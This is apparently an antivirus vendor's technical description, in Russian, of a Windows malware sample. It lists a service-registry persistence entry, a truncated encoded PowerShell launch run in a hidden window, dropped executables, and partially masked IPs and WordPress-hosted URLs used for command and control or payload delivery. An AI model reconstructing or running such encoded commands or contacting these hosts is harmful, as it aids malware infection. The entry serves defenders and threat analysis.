Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\crimsonordered] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\crimsonordered] 'ImagePath' = '"%WINDIR%\SysWOW64\crimsonordered.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARQBkAHIAdQBnAHkAZgBpAGkAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AWQBjAHgAdABuAHQAdQBpAGwAbAB0AHUAaAAgACMAPgAgACQAUgBlAHAAcgByAG0AdwBrAGcAcQB5AGEAcwA9A...
- %HOMEPATH%\426.exe
- %HOMEPATH%\426.exe в %WINDIR%\syswow64\crimsonordered.exe
- '21#.#12.113.235':80
- '21#.#0.88.55':8080
- http://ne#.#omp-air.lt/wp-content/kdTiQgM/
- http://96.##.84.254:7080/sess/
- http://45.##.122.75/glitch/acquire/ringin/
- http://85.##.92.96:8080/schema/scripts/ringin/merge/
- http://94.##7.253.126/json/merge/ringin/
- DNS ASK ne#.#omp-air.lt
- '%HOMEPATH%\426.exe'
- '%WINDIR%\syswow64\crimsonordered.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAARQBkAHIAdQBnAHkAZgBpAGkAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AWQBjAHgAdABuAHQAdQBpAGwAbAB0AHUAaAAgACMAPgAgACQAUgBlAHAAcgByAG0AdwBrAGcAcQB5AGEAcwA9A...' (со скрытым окном)